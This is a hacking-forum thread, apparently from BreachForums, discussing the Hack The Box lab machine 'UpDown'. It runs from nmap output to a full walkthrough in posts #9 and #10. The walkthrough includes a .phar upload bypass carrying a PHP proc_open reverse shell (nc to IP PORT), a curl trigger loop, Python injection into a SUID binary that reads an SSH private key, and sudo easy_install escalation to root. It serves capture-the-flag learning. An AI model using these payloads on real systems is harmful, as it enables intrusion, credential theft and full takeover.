Return to forum
UpDown - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
BreachForums User
VIP
Posts: 213
Threads: 0
Joined: N/A
Reputation: 56

#1
September 3, 2022 at 7:02 PM
New machine from 2022-09-03.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
|   256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_  256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Is my Website up ?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Reply
BreachForums User
VIP
Posts: 213
Threads: 0
Joined: N/A
Reputation: 56

#2
September 3, 2022 at 7:38 PM
http://dev.siteisup.htb/ exists.

I'm trying to check this website using Debug mode.
Reply
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 2

#3
September 3, 2022 at 7:45 PM
http://siteisup.htb/dev/.git/ is repo for http://dev.siteisup.htb
Reply
Banned
Posts: 24
Threads: 0
Joined: N/A
Reputation: 2

#4
September 3, 2022 at 7:45 PM
Git is open on http://siteisup.htb/dev/
Reply
BreachForums User
VIP
Posts: 213
Threads: 0
Joined: N/A
Reputation: 56

#5
September 3, 2022 at 7:55 PM
So I downloaded the .git directory and ran git diff.

We need to add the header "Special-Dev: only4dev" in order to view http://dev.siteisup.htb/
Reply
Member
Member
Posts: 21
Threads: 0
Joined: N/A
Reputation: 0

#6
September 3, 2022 at 8:40 PM
(September 3, 2022, 07:45 PM)technic Wrote: http://siteisup.htb/dev/.git/ is repo for http://dev.siteisup.htb

How did you find out ? I can'ty access http://siteisup.htb/dev
Reply
Member
Member
Posts: 21
Threads: 0
Joined: N/A
Reputation: 0

#7
September 3, 2022 at 8:51 PM
(September 3, 2022, 08:20 PM)Hacker2222 Wrote: file upload gets u ploaded in /uploads/ with directory travers. filtered on extensions but not .phar. can add php code at bottom, but has blocked functions. file gets deleted when every line is checked can but in long list to get exection tho


Struggling with burp to get a reverse shell to bite? perhaps LFI is the key here ? for SSH - just guessing! any movement ? uploads directories empty ?
Reply
Member
Member
Posts: 19
Threads: 0
Joined: N/A
Reputation: 0

#8
September 3, 2022 at 9:31 PM
(September 3, 2022, 08:40 PM)voidx01 Wrote:
(September 3, 2022, 07:45 PM)technic Wrote: http://siteisup.htb/dev/.git/ is repo for http://dev.siteisup.htb

How did you find out ? I can'ty access http://siteisup.htb/dev


wget -r http://siteisup.htb/dev/.git
Reply
Advanced User
Advanced
Posts: 74
Threads: 0
Joined: N/A
Reputation: 40

#9
September 3, 2022 at 11:17 PM
Here is how to root the box:First find the git repo on the webapp and the vhost.Dump the git repo using something like git-dumper.On the source code of git repo, check the checker.php file, you will see that you are able to upload files and .phar is not included in the upload filter.Also from .htaccess, you will see that you need a header like this to access the dev.siteisup.htb (You can use burp and just create a rule):[code]Special-Dev: only4dev[/code]So create a .phar file, and put like 200 to 300 lines of random url to gain some time, because after it checks the urls file gets deleted.Using this you are able to run some commands, but there are some disabled functions that prevents us from running system commands. You can use file_put_contents to put to a php file on wepapp and see what those functions are.proc_open function is not one of those disabled functions so after the urls put this by modifying the ip and port and upload the phar file:[code] array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to);$process = proc_open("sh", $descriptorspec, $pipes);if (is_resource($process)) { // $pipes now looks like this: // 0 => writeable handle connected to child stdin // 1 => readable handle connected to child stdout // Any error output will be appended to /tmp/error-output.txt fwrite($pipes[0], "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT >/tmp/f"); fclose($pipes[0]); while (!feof($pipes[1])) { echo fgets($pipes[1], 1024); } fclose($pipes[1]); // It is important that you close any pipes before calling // proc_close in order to avoid a deadlock $return_value = proc_close($process); echo "command returned $return_value";}?>[/code]And then you can just make a get request to the phar file with a command like this without to much bother:[code]curl -H 'Special-Dev: only4dev' -s http://dev.siteisup.htb/uploads/ | grep "\[DIR\]" | cut -d "\"" -f 8 > folder-names; while read -r line; do curl -v -H 'Special-Dev: only4dev' "http://dev.siteisup.htb/uploads/${line}.phar"; done < folder-names[/code]You should be able to get a shell with this.For www-data to user:The /home/developer/dev/siteisup binary has suid bit set for developer user.Running strings or just running it, it is clear that it just runs the python script with suid privileges.We can inject commands and get the user's ssh key by simply inputting something like:[code]__import__('os').system('cat /home/developer/.ssh/id_rsa')[/code]After logging in with the ssh key you got, checking sudo you will see this:[code]Matching Defaults entries for developer on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser developer may run the following commands on localhost: (ALL) NOPASSWD: /usr/local/bin/easy_install[/code]You can get root by running these commands from [url=https://gtfobins.github.io/gtfobins/easy_install/#sudo]GTFOBins[/url]:[code]TF=$(mktemp -d)echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.pysudo easy_install $TF[/code]

Reply
Member
Member
Posts: 18
Threads: 0
Joined: N/A
Reputation: 0

#10
September 4, 2022 at 1:57 AM
(September 3, 2022, 11:17 PM)11231123 Wrote: Here is how to root the box:

First find the git repo on the webapp and the vhost.

Dump the git repo using something like git-dumper.

On the source code of git repo, check the checker.php file, you will see that you are able to upload files and .phar is not included in the upload filter.

Also from .htaccess, you will see that you need a header like this to access the dev.siteisup.htb (You can use burp and just create a rule):

Special-Dev: only4dev


So create a .phar file, and put like 200 to 300 lines of random url to gain some time, because after it checks the urls file gets deleted.

Using this you are able to run some commands, but there are some disabled functions that prevents us from running system commands.

    You can use file_put_contents to put <?php phpinfo(); ?> to a php file on wepapp and see what those functions are.

proc_open function is not one of those disabled functions so after the urls put this by modifying the ip and port and upload the phar file:

<?php
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);
$process = proc_open("sh", $descriptorspec, $pipes);
if (is_resource($process)) {
    // $pipes now looks like this:
    // 0 => writeable handle connected to child stdin
    // 1 => readable handle connected to child stdout
    // Any error output will be appended to /tmp/error-output.txt

    fwrite($pipes[0], "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT >/tmp/f");
    fclose($pipes[0]);

    while (!feof($pipes[1])) {
        echo fgets($pipes[1], 1024);
    }
    fclose($pipes[1]);
    // It is important that you close any pipes before calling
    // proc_close in order to avoid a deadlock
    $return_value = proc_close($process);

    echo "command returned $return_value
";
}
?>


And then you can just make a get request to the phar file with a command like this without to much bother:

curl -H 'Special-Dev: only4dev' -s http://dev.siteisup.htb/uploads/ | grep "\[DIR\]" | cut -d "\"" -f 8 > folder-names; while read -r line; do curl -v -H 'Special-Dev: only4dev' "http://dev.siteisup.htb/uploads/${line}<PHAR-FILE-NAME>.phar"; done < folder-names


You should be able to get a shell with this.

For www-data to user:

The /home/developer/dev/siteisup binary has suid bit set for developer user.

Running strings or just running it, it is clear that it just runs the python script with suid privileges.

We can inject commands and get the user's ssh key by simply inputting something like:

__import__('os').system('cat /home/developer/.ssh/id_rsa')


After logging in with the ssh key you got, checking sudo you will see this:

Matching Defaults entries for developer on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User developer may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/local/bin/easy_install


You can get root by running these commands from GTFOBins:

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF


:pomhappy:
Reply


 Users viewing this thread: UpDown - HTB [Discussion]: No users currently viewing.